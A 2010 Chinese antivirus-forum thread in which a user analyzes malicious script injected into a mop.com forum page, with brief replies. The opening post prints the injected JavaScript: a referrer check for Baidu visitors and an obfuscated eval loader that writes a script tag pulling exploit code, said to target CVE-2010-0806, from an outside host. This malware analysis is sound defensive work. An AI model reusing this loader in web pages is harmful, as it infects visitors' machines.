瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 详细分析mop被挂马http://bbs.game.mop.com/viewthread.php?tid=1553601
Anges() - 2010-8-5 10:24:00
在我的映像中,mop首次被挂马是发生在nginx漏洞的时候(其实是php的漏洞,不在本文探讨范围之类)

开始挂的是那种不是智能型的网马,就是一打开连接就会触发的那种。随着过了一段时间,mop被挂上了智能型的


网马。




hxxp://bbs.game.mop.com/viewthread.php?tid=1553601 


这个是今天验证的恶意网址,为智能型网马,具体智能型在哪里,我慢慢讲解。


我们直接打开这个连接是不会触发网马的,我们先把这个连接丢进百度搜索,然后从搜索出来的连接在进去。
就会触发了。如图:


我们看下他的js是怎么写的。大家也可以自己去看下,具体js为:hxxp://bbs.game.mop.com/include/javascript/ajax.js


如图:
var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4.f(\'<c a=8 d=7://b.5.2.1/e/3/0/6.9></c>\')',62,16,'avatar|cn|com|data|document|enet|games|http|javascript|js|language|nbbbs|script|src|ucenter|writeln'.split('|'),0,{}));}}




哦,原来是判断referrer来源呢。看这智能型的网马。现在的黑x黑人的办法也是越来越多了。


ok,原来挂的是cve-2010-0806,nnd,挂马的人不知道我们装有瑞星杀毒是不会中招的么。哈哈,本文的mop挂马讲解就这此了,。


如果你先继续了解referrer。请看我博客的一篇文章,也是针对上次挂马被挂马的。


http://www.01aq.com/post/79.html如何伪造referrer点来触发智能型网马







networkedition~~~~~给师傅文章加分。。。:kaka12:


用户系统信息:Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4
悠悠Wǒ╭心 - 2010-8-5 11:04:00
呵呵,路过,顶一下。
Cool_wXd - 2010-8-5 11:26:00


引用:
原帖由 Anges() 于 2010-8-5 10:24:00 发表
networkedition~~~~~给师傅文章加分。。。



精华在这里!
是昔流芳 - 2010-8-5 12:04:00


引用:
原帖由 Cool_wXd 于 2010-8-5 11:26:00 发表


引用:
原帖由 Anges() 于 2010-8-5 10:24:00 发表
networkedition~~~~~给师傅文章加分。。。



精华在这里!


坐等孔子现身解释,o(∩_∩)o 哈哈
Anges() - 2010-8-5 12:38:00
你好黑,,,这都被发现了。:kaka7:
Cool_wXd - 2010-8-5 17:02:00
哈哈哈哈~
jks_风 - 2010-8-6 8:42:00
嘿嘿,刚才没发现这个文章。就是刚才解密不出来的时候才查的资料,嘿嘿
恩,明白了。学习了
http://zhidao.baidu.com/question/72543450.html?fr=ala0
凯撒不骑马 - 2013-3-31 20:15:00
:kaka2: 看不懂的路过 我是新人
1
查看完整版本: 详细分析mop被挂马http://bbs.game.mop.com/viewthread.php?tid=1553601